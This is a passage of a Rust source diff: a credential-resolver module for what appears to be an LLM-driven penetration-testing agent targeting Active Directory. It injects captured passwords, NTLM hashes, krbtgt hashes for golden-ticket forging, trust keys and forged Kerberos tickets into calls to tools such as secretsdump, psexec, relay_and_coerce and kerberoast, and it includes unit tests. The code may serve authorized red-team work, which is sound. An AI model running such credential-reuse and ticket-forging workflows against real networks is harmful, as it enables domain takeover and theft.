&hashes).await; + } + } + + // Trust keys — Hash entries for `$` machine accounts. + resolve_trust_key(args_obj, &hashes, &reader, conn).await; + + // Domain SIDs — direct lookup against the domain_sids HASH. + resolve_domain_sids(args_obj, &domain_sids); + + Ok(()) +} + +/// Remove any credential-shaped argument whose value is empty, null, or a +/// placeholder literal (e.g. `[HASH]`, ``, `N/A`, `unknown`). +fn strip_placeholder_credentials(args: &mut Map) { + let mut to_remove = Vec::new(); + for key in CREDENTIAL_KEYS { + if let Some(v) = args.get(*key) { + if is_placeholder_value(v) { + to_remove.push((*key).to_string()); + } + } + } + for key in to_remove { + warn!( + arg = %key, + "credential_resolver: stripping LLM-supplied placeholder credential" + ); + args.remove(&key); + } +} + +fn is_placeholder_value(v: &Value) -> bool { + match v { + Value::Null => true, + Value::String(s) => is_placeholder_str(s), + _ => false, + } +} + +fn is_placeholder_str(s: &str) -> bool { + let t = s.trim(); + if t.is_empty() { + return true; + } + // Bracketed placeholders: [TGT], [PWD], , + if (t.starts_with('[') && t.ends_with(']')) || (t.starts_with('<') && t.ends_with('>')) { + return true; + } + let lower = t.to_ascii_lowercase(); + // Bare placeholder words the LLM has been observed to invent. + matches!( + lower.as_str(), + "n/a" + | "na" + | "null" + | "none" + | "nil" + | "unknown" + | "tbd" + | "todo" + | "password" + | "hash" + | "ntlm" + | "nthash" + | "tgt" + | "ticket" + | "ccache" + | "aes" + | "aes_key" + | "trust_key" + | "domain_sid" + | "krbtgt_hash" + | "placeholder" + | "" + | "" + | "" + | "" + | "" + ) +} + +/// Resolve `password`, `hash`, `nt_hash`, `aes_key` for the primary principal. +/// +/// `realm_strict` controls cross-realm fallback. When true, only credentials +/// matching the requested `domain` are returned; the `any_user` fallback is +/// suppressed. Set this for tools that perform a direct bind against the +/// target realm's DC (LDAP/RPC), where a foreign-realm cred just produces +/// invalidCredentials (52e/775). Leave false for tools that traverse trusts +/// via Kerberos referral or NTLM pass-through (smbclient, secretsdump), +/// where the user-matching cred from a different realm still authenticates. +fn resolve_principal_credentials( + args: &mut Map, + credentials: &[Credential], + hashes: &[Hash], + username: &str, + domain: &str, + realm_strict: bool, +) { + if !args.contains_key("password") { + if let Some(cred) = find_credential(credentials, username, domain, realm_strict) { + if !cred.password.is_empty() { + args.insert("password".to_string(), Value::String(cred.password.clone())); + debug!( + user = %username, + domain = %domain, + "credential_resolver: injected password from state" + ); + } + } + } + + let hash_match = find_hash(hashes, username, domain, realm_strict); + if let Some(h) = hash_match { + if !args.contains_key("hash") && !h.hash_value.is_empty() { + args.insert("hash".to_string(), Value::String(h.hash_value.clone())); + debug!( + user = %username, + domain = %domain, + "credential_resolver: injected hash from state" + ); + } + if !args.contains_key("nt_hash") && !h.hash_value.is_empty() { + let nt = nt_hash_only(&h.hash_value).to_string(); + if !nt.is_empty() { + args.insert("nt_hash".to_string(), Value::String(nt)); + } + } + if !args.contains_key("aes_key") { + if let Some(aes) = h.aes_key.as_deref().filter(|s| !s.is_empty()) { + args.insert("aes_key".to_string(), Value::String(aes.to_string())); + } + } + } +} + +/// Inject `coerce_password` / `coerce_hash` for `relay_and_coerce` based on +/// `(coerce_user, coerce_domain)` in the args. Mirrors +/// `resolve_principal_credentials` but writes to the `coerce_*` keys. +/// +/// No-op when `coerce_user` is absent or empty. When the user has only a +/// password in state, sets `coerce_password`; when only a hash, sets +/// `coerce_hash`. If both exist, sets only `coerce_hash` (the auth path +/// downstream prefers PTH for relay-fallback DFSCoerce/Coercer auth). +fn resolve_coerce_principal( + args: &mut Map, + credentials: &[Credential], + hashes: &[Hash], +) { + let Some(user) = string_field(args, "coerce_user") else { + return; + }; + if user.is_empty() { + return; + } + let domain = string_field(args, "coerce_domain").unwrap_or_default(); + + if !args.contains_key("coerce_hash") && !args.contains_key("coerce_password") { + if let Some(h) = find_hash(hashes, &user, &domain, false) { + if !h.hash_value.is_empty() { + args.insert( + "coerce_hash".to_string(), + Value::String(h.hash_value.clone()), + ); + debug!( + user = %user, + domain = %domain, + "credential_resolver: injected coerce_hash from state" + ); + return; + } + } + if let Some(cred) = find_credential(credentials, &user, &domain, false) { + if !cred.password.is_empty() { + args.insert( + "coerce_password".to_string(), + Value::String(cred.password.clone()), + ); + debug!( + user = %user, + domain = %domain, + "credential_resolver: injected coerce_password from state" + ); + } + } + } +} + +/// Look up the krbtgt hash for the relevant domain when the tool needs it. +/// +/// Tools like `generate_golden_ticket` consume `krbtgt_hash`. The LLM names +/// the domain to forge in; we look up the most recent `Hash` for `krbtgt` in +/// that domain. +fn resolve_krbtgt_hashes(args: &mut Map, hashes: &[Hash]) { + // krbtgt is per-domain — never cross-realm fall back. A different + // domain's krbtgt forges a useless ticket. + if !args.contains_key("krbtgt_hash") { + if let Some(domain) = string_field(args, "domain") { + if let Some(h) = find_hash(hashes, "krbtgt", &domain, true) { + if !h.hash_value.is_empty() { + args.insert( + "krbtgt_hash".to_string(), + Value::String(h.hash_value.clone()), + ); + } + } + } + } + + if !args.contains_key("child_krbtgt_hash") { + if let Some(child) = string_field(args, "child_domain") { + if let Some(h) = find_hash(hashes, "krbtgt", &child, true) { + if !h.hash_value.is_empty() { + args.insert( + "child_krbtgt_hash".to_string(), + Value::String(h.hash_value.clone()), + ); + } + } + } + } +} + +/// Resolve the inter-realm trust key for cross-domain ticket forging. +/// +/// Trust keys are stored as `Hash` entries with username `$` +/// in the source domain (where the trust was extracted). We try both the +/// trusted-domain name and its NetBIOS flat name from the trust info. +async fn resolve_trust_key( + args: &mut Map, + hashes: &[Hash], + reader: &RedisStateReader, + conn: &mut ConnectionManager, +) { + if args.contains_key("trust_key") { + return; + } + let Some(source_domain) = string_field(args, "source_domain") + .or_else(|| string_field(args, "domain")) + .or_else(|| string_field(args, "child_domain")) + else { + return; + }; + let Some(target_domain) = string_field(args, "target_domain") + .or_else(|| string_field(args, "trusted_domain")) + .or_else(|| string_field(args, "parent_domain")) + else { + return; + }; + + // Possible trust account usernames the worker has stored. + let mut candidates: Vec = vec![ + format!("{}$", target_domain.split('.').next().unwrap_or("")).to_uppercase(), + format!("{target_domain}$"), + ]; + // Look up flat name from trust info. + if let Ok(trusted) = reader.get_trusted_domains(conn).await { + if let Some(trust) = trusted.get(&target_domain.to_lowercase()) { + if !trust.flat_name.is_empty() { + candidates.push(format!("{}$", trust.flat_name)); + candidates.push(format!("{}$", trust.flat_name.to_uppercase())); + } + } + } + candidates.retain(|c| !c.is_empty() && !c.starts_with('$')); + + for cand in &candidates { + // Trust keys are per-(source, target$) — never cross-realm fall back. + if let Some(h) = find_hash(hashes, cand, &source_domain, true) { + if !h.hash_value.is_empty() { + args.insert("trust_key".to_string(), Value::String(h.hash_value.clone())); + if !args.contains_key("trust_aes_key") { + if let Some(aes) = h.aes_key.as_deref().filter(|s| !s.is_empty()) { + args.insert("trust_aes_key".to_string(), Value::String(aes.to_string())); + } + } + debug!( + source = %source_domain, + target = %target_domain, + account = %cand, + "credential_resolver: injected trust_key from state" + ); + return; + } + } + } +} + +/// Resolve `domain_sid`, `source_sid`, `target_sid` from the `domain_sids` HASH. +fn resolve_domain_sids( + args: &mut Map, + domain_sids: &std::collections::HashMap, +) { + let lookups: &[(&str, &[&str])] = &[ + ("domain_sid", &["domain"]), + ("source_sid", &["source_domain", "domain", "child_domain"]), + ( + "target_sid", + &["target_domain", "trusted_domain", "parent_domain"], + ), + ]; + + for (sid_key, domain_keys) in lookups { + if args.contains_key(*sid_key) { + continue; + } + for domain_key in *domain_keys { + if let Some(domain) = string_field(args, domain_key) { + if let Some(sid) = lookup_domain_sid(domain_sids, &domain) { + args.insert((*sid_key).to_string(), Value::String(sid)); + break; + } + } + } + } +} + +fn lookup_domain_sid( + domain_sids: &std::collections::HashMap, + domain: &str, +) -> Option { + let lower = domain.to_lowercase(); + if let Some(s) = domain_sids.get(&lower) { + return Some(s.clone()); + } + domain_sids.get(domain).cloned() +} + +// ─── Helpers ──────────────────────────────────────────────────────────────── + +/// Best-effort domain resolution from a tool call's target arguments. +/// +/// Walks the standard target argument keys in priority order: +/// - IP-shaped values are matched against the DC map (`domain → dc_ip`), +/// returning the DC's domain. +/// - FQDN-shaped values return their domain suffix (`dc01.contoso.local` +/// → `contoso.local`). +/// - Bare hostnames / unmatched IPs are skipped — a wrong-domain guess +/// here would just produce an authentication failure. +async fn infer_domain_from_target( + args: &Map, + conn: &mut ConnectionManager, + reader: &RedisStateReader, +) -> Option { + const TARGET_KEYS: &[&str] = &[ + "target", + "target_ip", + "dc_ip", + "target_host", + "target_hostname", + "hostname", + "host", + ]; + + let dc_map = reader.get_dc_map(conn).await.unwrap_or_default(); + + for key in TARGET_KEYS { + let Some(value) = string_field(args, key) else { + continue; + }; + // FQDN suffix: anything with a dot that isn't an IP literal. + if !looks_like_ip(&value) { + if let Some((_, suffix)) = value.split_once('.') { + let s = suffix.trim().to_lowercase(); + if !s.is_empty() && s.contains('.') { + return Some(s); + } + } + continue; + } + // IP literal: look up against the DC map. + for (domain, ip) in &dc_map { + if ip.trim() == value { + let d = domain.trim().to_lowercase(); + if !d.is_empty() { + return Some(d); + } + } + } + } + None +} + +fn looks_like_ip(s: &str) -> bool { + let trimmed = s.trim(); + let octets: Vec<&str> = trimmed.split('.').collect(); + octets.len() == 4 && octets.iter().all(|o| o.parse::().is_ok()) +} + +fn string_field(args: &Map, key: &str) -> Option { + args.get(key) + .and_then(|v| v.as_str()) + .map(|s| s.trim().to_string()) + .filter(|s| !s.is_empty()) +} + +fn find_credential<'a>( + credentials: &'a [Credential], + username: &str, + domain: &str, + realm_strict: bool, +) -> Option<&'a Credential> { + let user_l = username.to_lowercase(); + let domain_l = domain.to_lowercase(); + let domain_empty = domain_l.is_empty(); + + let mut exact: Option<&Credential> = None; + let mut any_user: Option<&Credential> = None; + for cred in credentials { + if cred.username.to_lowercase() != user_l { + continue; + } + if cred.password.is_empty() || is_placeholder_str(&cred.password) { + continue; + } + let domain_match = domain_empty || cred.domain.to_lowercase() == domain_l; + if domain_match { + match exact { + None => exact = Some(cred), + Some(prev) if cred.attack_step >= prev.attack_step => exact = Some(cred), + _ => {} + } + } + match any_user { + None => any_user = Some(cred), + Some(prev) if cred.attack_step >= prev.attack_step => any_user = Some(cred), + _ => {} + } + } + // Realm-strict callers (LDAP/RPC direct bind) MUST get an exact-realm + // match or nothing. A foreign-realm cred just produces 52e/775 at bind + // time and burns the dispatch. + if realm_strict { + return exact; + } + // Username-only fallback: when the LLM passes the *target* domain (the + // tool's destination) instead of the credential's home realm, exact match + // fails. Cross-realm tools (smbclient against a foreign DC, secretsdump + // with cross-forest principal) still need that user's password — Kerberos + // referrals or NTLM pass-through handle the actual auth. Returning a + // user-matching cred from a different realm beats refusing the dispatch + // and forcing the agent to re-request the same lookup. + // + // Skip the fallback for common per-domain accounts: each AD domain has + // its own `Administrator`/`Guest`/`krbtgt` SAM account with a different + // password and SID. Substituting one domain's `Administrator` for + // another's just produces STATUS_LOGON_FAILURE and burns a tool call. + if exact.is_some() || !is_common_per_domain_account(&user_l) { + exact.or(any_user) + } else { + exact + } +} + +fn is_common_per_domain_account(user_l: &str) -> bool { + matches!(user_l, "administrator" | "guest" | "krbtgt") +} + +/// Tools that authenticate via direct bind to the target realm's DC (LDAP or +/// LDAP-backed RPC). For these, a cross-realm cred from another forest just +/// produces STATUS_LOGON_FAILURE / invalidCredentials. The orchestrator gets +/// faster forward progress by returning no credential — the dispatch fails +/// cleanly, the failure is reported back, and the orchestrator can re-derive +/// the right principal — than by injecting a wrong-realm cred that wastes +/// the LLM's tool budget on a guaranteed-failed bind. +/// +/// Tools NOT in this list (smbclient, secretsdump, nxc) traverse trusts via +/// Kerberos referral or NTLM pass-through and benefit from the cross-realm +/// `any_user` fallback. +pub(crate) fn requires_exact_realm(tool_name: &str) -> bool { + matches!( + tool_name, + "bloodyad_set_password" + | "bloodyad_add_group_member" + | "bloodyad_add_genericall" + | "dacl_edit" + | "pywhisker" + | "ldap_search" + | "ldap_search_descriptions" + | "ldap_acl_enumeration" + | "targeted_kerberoast" + | "kerberoast" + | "nopac" + | "certifried" + | "enumerate_domain_trusts" + ) +} + +fn find_hash<'a>( + hashes: &'a [Hash], + username: &str, + domain: &str, + realm_strict: bool, +) -> Option<&'a Hash> { + let user_l = username.to_lowercase(); + let domain_l = domain.to_lowercase(); + let domain_empty = domain_l.is_empty(); + + let mut exact: Option<&Hash> = None; + let mut exact_aes: Option<&Hash> = None; + let mut any_user: Option<&Hash> = None; + let mut any_user_aes: Option<&Hash> = None; + for h in hashes { + if h.username.to_lowercase() != user_l { + continue; + } + if h.hash_value.is_empty() { + continue; + } + if !is_authenticating_hash_type(&h.hash_type) { + continue; + } + let h_domain_l = h.domain.to_lowercase(); + let domain_match = domain_empty || h.domain.is_empty() || h_domain_l == domain_l; + let has_aes = h.aes_key.as_deref().is_some_and(|s| !s.is_empty()); + if domain_match { + match exact { + None => exact = Some(h), + Some(prev) if h.attack_step >= prev.attack_step => exact = Some(h), + _ => {} + } + if has_aes { + match exact_aes { + None => exact_aes = Some(h), + Some(prev) if h.attack_step >= prev.attack_step => exact_aes = Some(h), + _ => {} + } + } + } + match any_user { + None => any_user = Some(h), + Some(prev) if h.attack_step >= prev.attack_step => any_user = Some(h), + _ => {} + } + if has_aes { + match any_user_aes { + None => any_user_aes = Some(h), + Some(prev) if h.attack_step >= prev.attack_step => any_user_aes = Some(h), + _ => {} + } + } + } + let exact_pick = exact_aes.or(exact); + if realm_strict { + return exact_pick; + } + if exact_pick.is_some() || !is_common_per_domain_account(&user_l) { + exact_pick.or(any_user_aes).or(any_user) + } else { + exact_pick + } +} + +/// True when this hash type can be used directly for authentication (NTLM, +/// AES key). False for offline-cracking artifacts like kerberoast/asreproast +/// TGS ciphertext. +fn is_authenticating_hash_type(hash_type: &str) -> bool { + let t = hash_type.to_ascii_lowercase(); + !matches!( + t.as_str(), + "kerberoast" | "asreproast" | "asrep" | "tgs" | "krb5tgs" | "krb5asrep" + ) +} + +/// Strip an `LM:NT` colon-form hash to just the NT half. +fn nt_hash_only(hash: &str) -> &str { + hash.rsplit(':').next().unwrap_or(hash).trim() +} + +/// True when the tool expects a Kerberos ticket and the args don't have one. +fn expects_ticket(tool_name: &str, args: &Map) -> bool { + if args.contains_key("ticket_path") { + return false; + } + tool_name.ends_with("_kerberos") + || matches!( + tool_name, + "secretsdump_kerberos" | "psexec_kerberos" | "wmiexec_kerberos" | "smbexec_kerberos" + ) +} + +/// Find the most-recent `*.ccache` file in the worker's working directory that +/// matches the principal. +/// +/// Convention: tools that forge tickets save them as `.ccache` in CWD. +/// We accept either an exact match or any ccache when the principal matches by +/// stem. +fn find_ccache(username: &str, _domain: &str) -> Option { + let cwd = std::env::current_dir().ok()?; + let user_lower = username.to_lowercase(); + + let mut best: Option<(std::time::SystemTime, PathBuf)> = None; + let entries = std::fs::read_dir(&cwd).ok()?; + for entry in entries.flatten() { + let path = entry.path(); + let Some(name) = path.file_name().and_then(|s| s.to_str()) else { + continue; + }; + if !name.ends_with(".ccache") { + continue; + } + let stem = name.trim_end_matches(".ccache").to_lowercase(); + if stem != user_lower && !stem.starts_with(&user_lower) { + continue; + } + let mtime = entry + .metadata() + .and_then(|m| m.modified()) + .unwrap_or(std::time::SystemTime::UNIX_EPOCH); + match &best { + None => best = Some((mtime, path)), + Some((t, _)) if mtime >= *t => best = Some((mtime, path)), + _ => {} + } + } + best.map(|(_, p)| p.to_string_lossy().to_string()) +} + +/// Inject `ticket_path` for a cross-forest LDAP-bind tool using a forged +/// inter-realm ccache stored in Redis. +/// +/// Called only when `requires_exact_realm(tool_name)` is true and the +/// primary domain has no matching NTLM credential in state (i.e. the target +/// is a foreign forest where NTLM bind would return 0x52e). Looks up the +/// `kerberos_tickets` HASH for a `(*, target_domain, Administrator)` entry +/// and injects the ccache path into `args["ticket_path"]`. +/// +/// If the target domain doesn't have a kerberos ticket in Redis this is a +/// no-op — the tool will fail with a missing-credential error, which is the +/// correct signal to the orchestrator. +async fn resolve_cross_forest_ticket( + args: &mut Map, + reader: &RedisStateReader, + conn: &mut ConnectionManager, + tool_name: &str, + target_domain: &str, + hashes: &[Hash], +) { + // Only fire when the tool has no usable NTLM credential for the target + // domain (i.e. the realm_strict check already blocked cross-realm fallback). + // If there's already an exact-domain hash for a non-common account, NTLM + // bind will work and we don't need Kerberos. + let user_l = string_field(args, "username") + .map(|u| u.to_lowercase()) + .unwrap_or_default(); + let domain_l = target_domain.to_lowercase(); + let has_ntlm = hashes.iter().any(|h| { + h.domain.to_lowercase() == domain_l + && (user_l.is_empty() || h.username.to_lowercase() == user_l) + && !h.hash_value.is_empty() + && is_authenticating_hash_type(&h.hash_type) + }); + if has_ntlm { + // NTLM bind is available — no need to inject Kerberos ticket. + return; + } + + // Look up kerberos_tickets HASH in Redis. + let tickets = reader.get_kerberos_tickets(conn).await.unwrap_or_default(); + + // Find the most recent ticket for the target domain (any source, Administrator). + // Administrator is the only username we forge in the suppression path. + let ticket = tickets.iter().find(|t| { + t.target_domain.to_lowercase() == domain_l + && t.username.eq_ignore_ascii_case("Administrator") + && !t.ticket_path.is_empty() + }); + + let Some(ticket) = ticket else { + debug!( + tool = %tool_name, + target_domain = %target_domain, + "credential_resolver: no inter-realm Kerberos ticket found for cross-forest tool" + ); + return; + }; + + // Sanity-check the ccache exists on disk (best-effort — workers may not + // share the same host in some deployments). + if !std::path::Path::new(&ticket.ticket_path).exists() { + warn!( + tool = %tool_name, + target_domain = %target_domain, + ticket_path = %ticket.ticket_path, + "credential_resolver: inter-realm ccache not found on disk — skipping injection" + ); + return; + } + + info!( + tool = %tool_name, + target_domain = %target_domain, + ticket_path = %ticket.ticket_path, + source_domain = %ticket.source_domain, + "credential_resolver: injecting inter-realm Kerberos ticket for cross-forest LDAP bind" + ); + args.insert( + "ticket_path".to_string(), + Value::String(ticket.ticket_path.clone()), + ); + + // GSSAPI bind needs an FQDN to derive the ldap/@ SPN. If the + // LLM passed an IP for `target`, look up the host's hostname from state + // and rewrite. Without this, ldapsearch -Y GSSAPI errors with no Kerberos + // service principal name found. + if let Some(ip_str) = string_field(args, "target") { + if ip_str.parse::().is_ok() { + let hosts = reader.get_hosts(conn).await.unwrap_or_default(); + let domain_l = target_domain.to_lowercase(); + let host_match = hosts + .iter() + .find(|h| h.ip == ip_str && !h.hostname.is_empty()); + if let Some(h) = host_match { + let hn = h.hostname.to_lowercase(); + let fqdn = if hn.ends_with(&format!(".{domain_l}")) || hn == domain_l { + hn + } else { + format!("{hn}.{domain_l}") + }; + info!( + tool = %tool_name, + old_target = %ip_str, + new_target = %fqdn, + "credential_resolver: rewrote target IP to FQDN for GSSAPI bind" + ); + args.insert("target".to_string(), Value::String(fqdn)); + } else { + warn!( + tool = %tool_name, + target_ip = %ip_str, + target_domain = %target_domain, + "credential_resolver: no FQDN found for target IP — GSSAPI bind may fail SPN lookup" + ); + } + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + use ares_core::models::{Credential, Hash}; + use serde_json::json; + + fn cred(user: &str, domain: &str, pass: &str) -> Credential { + Credential { + id: format!("c-{user}"), + username: user.to_string(), + password: pass.to_string(), + domain: domain.to_string(), + source: "test".into(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + } + } + + fn hash(user: &str, domain: &str, value: &str, aes: Option<&str>) -> Hash { + Hash { + id: format!("h-{user}"), + username: user.to_string(), + hash_value: value.to_string(), + hash_type: "NTLM".into(), + domain: domain.to_string(), + cracked_password: None, + source: "test".into(), + discovered_at: None, + parent_id: None, + attack_step: 0, + aes_key: aes.map(String::from), + } + } + + #[test] + fn placeholder_str_recognizes_brackets() { + assert!(is_placeholder_str("[TGT]")); + assert!(is_placeholder_str("[HASH]")); + assert!(is_placeholder_str("")); + assert!(is_placeholder_str("")); + } + + #[test] + fn placeholder_str_recognizes_words() { + assert!(is_placeholder_str("N/A")); + assert!(is_placeholder_str("null")); + assert!(is_placeholder_str("None")); + assert!(is_placeholder_str("unknown")); + assert!(is_placeholder_str("password")); + assert!(is_placeholder_str("HASH")); + assert!(is_placeholder_str(" TGT ")); + } + + #[test] + fn placeholder_str_passes_real_values() { + assert!(!is_placeholder_str("aad3b435b51404eeaad3b435b51404ee")); + assert!(!is_placeholder_str("d350c5900e26d2c95f501e94cf95b078")); + assert!(!is_placeholder_str("P@ssw0rd!")); + assert!(!is_placeholder_str("/tmp/Administrator.ccache")); + } + + #[test] + fn placeholder_str_empty_is_placeholder() { + assert!(is_placeholder_str("")); + assert!(is_placeholder_str(" ")); + } + + #[test] + fn strip_placeholder_credentials_removes_bracketed() { + let mut args = json!({ + "username": "admin", + "domain": "contoso.local", + "password": "[PWD]", + "hash": "" + }) + .as_object() + .unwrap() + .clone(); + strip_placeholder_credentials(&mut args); + assert!(!args.contains_key("password")); + assert!(!args.contains_key("hash")); + assert_eq!(args.get("username").unwrap().as_str(), Some("admin")); + } + + #[test] + fn strip_placeholder_credentials_keeps_real() { + let mut args = json!({ + "password": "P@ssw0rd!", + "hash": "aad3b435b51404eeaad3b435b51404ee" + }) + .as_object() + .unwrap() + .clone(); + strip_placeholder_credentials(&mut args); + assert!(args.contains_key("password")); + assert!(args.contains_key("hash")); + } + + #[test] + fn find_credential_returns_match() { + let creds = vec![ + cred("admin", "contoso.local", "P@ss1"), + cred("guest", "contoso.local", "guest1"), + ]; + let found = find_credential(&creds, "admin", "contoso.local", false).unwrap(); + assert_eq!(found.password, "P@ss1"); + } + + #[test] + fn find_credential_case_insensitive() { + let creds = vec![cred("Admin", "Contoso.Local", "P@ss1")]; + let found = find_credential(&creds, "admin", "contoso.local", false).unwrap(); + assert_eq!(found.password, "P@ss1"); + } + + #[test] + fn find_credential_cross_realm_fallback() { + // LLM passes target domain (fabrikam.local) for a tool acting as a + // user whose home realm is child.contoso.local. The resolver + // should still return the user's stored cred so the cross-realm + // auth attempt can proceed via Kerberos referral / NTLM pass-through. + let creds = vec![cred("alice", "child.contoso.local", "P@ss1")]; + let found = find_credential(&creds, "alice", "fabrikam.local", false).unwrap(); + assert_eq!(found.password, "P@ss1"); + assert_eq!(found.domain, "child.contoso.local"); + } + + #[test] + fn find_credential_exact_match_preferred_over_other_realm() { + // When both an exact-domain match and a different-domain match exist + // for the same username, the exact match wins. + let creds = vec![ + cred("admin", "fabrikam.local", "wrong"), + cred("admin", "contoso.local", "right"), + ]; + let found = find_credential(&creds, "admin", "contoso.local", false).unwrap(); + assert_eq!(found.password, "right"); + } + + #[test] + fn find_credential_empty_password_skipped() { + let creds = vec![cred("admin", "contoso.local", "")]; + assert!(find_credential(&creds, "admin", "contoso.local", false).is_none()); + } + + #[test] + fn find_credential_realm_strict_blocks_cross_realm_fallback() { + // The resolver MUST NOT inject a child-realm cred when the tool + // (e.g. bloodyad_set_password against fabrikam.local DC) requires an + // exact-realm bind. Wrong-realm cred → 52e/775 at LDAP bind, which + // wastes the dispatch and burns the agent's tool budget. + let creds = vec![cred("bob", "child.contoso.local", "P@ss1")]; + let found = find_credential(&creds, "bob", "fabrikam.local", true); + assert!( + found.is_none(), + "realm_strict must block cross-realm any_user fallback" + ); + } + + #[test] + fn find_credential_realm_strict_returns_exact_match() { + // Strict mode still returns an exact-realm match, even when other + // realms have the same username with different passwords. + let creds = vec![ + cred("admin", "fabrikam.local", "wrong"), + cred("admin", "contoso.local", "right"), + ]; + let found = find_credential(&creds, "admin", "contoso.local", true).unwrap(); + assert_eq!(found.password, "right"); + } + + #[test] + fn find_hash_realm_strict_blocks_cross_realm_fallback() { + let hashes = vec![hash( + "bob", + "child.contoso.local", + "deadbeef", + None, + )]; + let found = find_hash(&hashes, "bob", "fabrikam.local", true); + assert!( + found.is_none(), + "realm_strict must block cross-realm any_user fallback for hashes" + ); + } + + #[test] + fn find_hash_realm_strict_returns_exact_match() { + let hashes = vec![ + hash("admin", "fabrikam.local", "fabhash", None), + hash("admin", "contoso.local", "conhash", None), + ]; + let found = find_hash(&hashes, "admin", "contoso.local", true).unwrap(); + assert_eq!(found.hash_value, "conhash"); + } + + #[test] + fn requires_exact_realm_covers_ldap_bind_tools() { + for tool in [ + "bloodyad_set_password", + "bloodyad_add_group_member", + "bloodyad_add_genericall", + "dacl_edit", + "pywhisker", + "ldap_search", + "ldap_search_descriptions", + "ldap_acl_enumeration", + "targeted_kerberoast", + "kerberoast", + "nopac", + "certifried", + "enumerate_domain_trusts", + ] { + assert!( + requires_exact_realm(tool), + "{tool} should require exact-realm bind" + ); + } + } + + #[test] + fn requires_exact_realm_excludes_trust_traversal_tools() { + // Tools that auth via Kerberos referral or NTLM pass-through MUST + // keep the cross-realm any_user fallback — they actually use the + // returned cred to traverse a trust. + for tool in [ + "smbclient", + "secretsdump", + "nxc_smb", + "psexec", + "wmiexec", + "smb_login_check", + ] { + assert!( + !requires_exact_realm(tool), + "{tool} should NOT require exact-realm bind (uses referral/pass-through)" + ); + } + } + + #[test] + fn find_hash_prefers_aes_record() { + let hashes = vec![ + hash("admin", "contoso.local", "abc1", None), + hash("admin", "contoso.local", "abc1", Some("aes-key-456")), + ]; + let found = find_hash(&hashes, "admin", "contoso.local", false).unwrap(); + assert!(found.aes_key.is_some()); + } + + #[test] + fn find_hash_allows_empty_domain() { + // Older imports may not record domain on Hash records. + let hashes = vec![hash("admin", "", "abc1", None)]; + let found = find_hash(&hashes, "admin", "contoso.local", false); + assert!(found.is_some()); + } + + #[test] + fn find_hash_cross_realm_fallback() { + // Same intent as find_credential_cross_realm_fallback: the LLM passes + // the target domain but the only stored hash for the user is in their + // home realm. Return the home-realm hash rather than nothing. + let hashes = vec![hash( + "alice", + "child.contoso.local", + "deadbeef", + None, + )]; + let found = find_hash(&hashes, "alice", "fabrikam.local", false).unwrap(); + assert_eq!(found.hash_value, "deadbeef"); + assert_eq!(found.domain, "child.contoso.local"); + } + + #[test] + fn find_hash_exact_realm_wins_over_other_realm() { + let hashes = vec![ + hash("admin", "fabrikam.local", "fabhash", None), + hash("admin", "contoso.local", "conhash", None), + ]; + let found = find_hash(&hashes, "admin", "contoso.local", false).unwrap(); + assert_eq!(found.hash_value, "conhash"); + } + + #[test] + fn find_hash_skips_kerberoast_tgs() { + // Kerberoast TGS ciphertext must never be injected as `hash=…` — + // impacket bombs out with "Odd-length string" since it's not NTLM. + let mut tgs = hash( + "eve", + "child.local", + "$krb5tgs$23$*eve$CHILD.LOCAL$child.local/eve*$abc...", + None, + ); + tgs.hash_type = "kerberoast".to_string(); + let hashes = vec![tgs]; + let found = find_hash(&hashes, "eve", "child.local", false); + assert!( + found.is_none(), + "kerberoast TGS must not be returned as authenticating hash" + ); + } + + #[test] + fn find_hash_keeps_ntlm_when_kerberoast_also_present() { + let mut tgs = hash("eve", "child.local", "$krb5tgs$23$*...", None); + tgs.hash_type = "kerberoast".to_string(); + let ntlm = hash( + "eve", + "child.local", + "aad3b435b51404eeaad3b435b51404ee:d350c5900e26d2c95f501e94cf95b078", + None, + ); + let hashes = vec![tgs, ntlm]; + let found = find_hash(&hashes, "eve", "child.local", false).unwrap(); + assert!(found.hash_value.starts_with("aad3")); + } + + #[test] + fn resolve_principal_credentials_injects_password() { + let creds = vec![cred("admin", "contoso.local", "P@ss1")]; + let hashes: Vec = vec![]; + let mut args = json!({"username": "admin", "domain": "contoso.local"}) + .as_object() + .unwrap() + .clone(); + resolve_principal_credentials(&mut args, &creds, &hashes, "admin", "contoso.local", false); + assert_eq!(args.get("password").unwrap().as_str(), Some("P@ss1")); + } + + #[test] + fn resolve_principal_credentials_injects_hash_and_aes() { + let creds: Vec = vec![]; + let hashes = vec![hash("admin", "contoso.local", "abc1", Some("aes-256"))]; + let mut args = json!({"username": "admin", "domain": "contoso.local"}) + .as_object() + .unwrap() + .clone(); + resolve_principal_credentials(&mut args, &creds, &hashes, "admin", "contoso.local", false); + assert_eq!(args.get("hash").unwrap().as_str(), Some("abc1")); + assert_eq!(args.get("aes_key").unwrap().as_str(), Some("aes-256")); + assert_eq!(args.get("nt_hash").unwrap().as_str(), Some("abc1")); + } + + #[test] + fn resolve_principal_credentials_injects_nt_from_lm_nt_pair() { + let creds: Vec = vec![]; + let hashes = vec![hash( + "admin", + "contoso.local", + "aad3b435b51404eeaad3b435b51404ee:d350c5900e26d2c95f501e94cf95b078", + None, + )]; + let mut args = json!({"username": "admin", "domain": "contoso.local"}) + .as_object() + .unwrap() + .clone(); + resolve_principal_credentials(&mut args, &creds, &hashes, "admin", "contoso.local", false); + assert_eq!( + args.get("nt_hash").unwrap().as_str(), + Some("d350c5900e26d2c95f501e94cf95b078") + ); + } + + #[test] + fn resolve_principal_credentials_does_not_overwrite_existing() { + let creds = vec![cred("admin", "contoso.local", "fromstate")]; + let hashes: Vec = vec![]; + let mut args = json!({ + "username": "admin", + "domain": "contoso.local", + "password": "passed-in" + }) + .as_object() + .unwrap() + .clone(); + resolve_principal_credentials(&mut args, &creds, &hashes, "admin", "contoso.local", false); + assert_eq!(args.get("password").unwrap().as_str(), Some("passed-in")); + } + + #[test] + fn resolve_coerce_principal_injects_password() { + let creds = vec![cred("svc-coerce", "contoso.local", "C0erceP@ss")]; + let hashes: Vec = vec![]; + let mut args = json!({ + "ca_host": "ca.contoso.local", + "coerce_target": "dc01.contoso.local", + "coerce_user": "svc-coerce", + "coerce_domain": "contoso.local" + }) + .as_object() + .unwrap() + .clone(); + resolve_coerce_principal(&mut args, &creds, &hashes); + assert_eq!( + args.get("coerce_password").unwrap().as_str(), + Some("C0erceP@ss") + ); + assert!(args.get("coerce_hash").is_none()); + } + + #[test] + fn resolve_coerce_principal_injects_hash() { + let creds: Vec = vec![]; + let hashes = vec![hash("svc-coerce", "contoso.local", "deadbeef", None)]; + let mut args = json!({ + "ca_host": 